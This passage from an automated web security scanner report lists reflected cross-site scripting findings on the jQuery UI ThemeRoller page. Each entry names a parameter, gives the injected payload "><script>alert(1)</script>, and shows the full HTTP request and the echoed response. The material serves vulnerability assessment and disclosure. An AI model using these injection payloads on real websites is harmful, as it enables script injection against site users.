ss.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa12395b"><script>alert(1)</script>8ecdffb1e74&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

4.616. http://jqueryui.com/themeroller/ [borderColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b414b"><script>alert(1)</script>cbdbb3617a4 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999b414b"><script>alert(1)</script>cbdbb3617a4&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:03:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999b414b"><script>alert(1)</script>cbdbb3617a4&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgT
...[SNIP]...

4.617. http://jqueryui.com/themeroller/ [cornerRadius parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b14a3"><script>alert(1)</script>3eca6ed1bd7 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxb14a3"><script>alert(1)</script>3eca6ed1bd7&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4pxb14a3"><script>alert(1)</script>3eca6ed1bd7&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgIm
...[SNIP]...

4.618. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b395e"><script>alert(1)</script>c7a91a75fbb was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxb395e"><script>alert(1)</script>c7a91a75fbb HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:07:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxb395e"><script>alert(1)</script>c7a91a75fbb" type="text/css" media="all" />
...[SNIP]...

4.619. http://jqueryui.com/themeroller/ [fcActive parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7834"><script>alert(1)</script>35a9a1124a8 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121e7834"><script>alert(1)</script>35a9a1124a8&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:04:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ss.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121e7834"><script>alert(1)</script>35a9a1124a8&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgT
...[SNIP]...

4.620. http://jqueryui.com/themeroller/ [fcContent parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c18bf"><script>alert(1)</script>445200790c3 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222c18bf"><script>alert(1)</script>445200790c3&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:01:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222c18bf"><script>alert(1)</script>445200790c3&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover
...[SNIP]...

4.621. http://jqueryui.com/themeroller/ [fcDefault parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8eb74"><script>alert(1)</script>eed56a15338 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555558eb74"><script>alert(1)</script>eed56a15338&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:03:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
pacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555558eb74"><script>alert(1)</script>eed56a15338&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.
...[SNIP]...

4.622. http://jqueryui.com/themeroller/ [fcError parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af1b1"><script>alert(1)</script>62cef94653f was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0aaf1b1"><script>alert(1)</script>62cef94653f&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0aaf1b1"><script>alert(1)</script>62cef94653f&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&
...[SNIP]...

4.623. http://jqueryui.com/themeroller/ [fcHeader parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9d06"><script>alert(1)</script>26968f44dc0 was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222f9d06"><script>alert(1)</script>26968f44dc0&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:00:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222f9d06"><script>alert(1)</script>26968f44dc0&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefau
...[SNIP]...

4.624. http://jqueryui.com/themeroller/ [fcHighlight parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf963"><script>alert(1)</script>72faaf79734 was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636cf963"><script>alert(1)</script>72faaf79734&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:21 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Active=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636cf963"><script>alert(1)</script>72faaf79734&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_fl
...[SNIP]...

4.625. http://jqueryui.com/themeroller/ [fcHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d5c"><script>alert(1)</script>421aee9aa0f was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

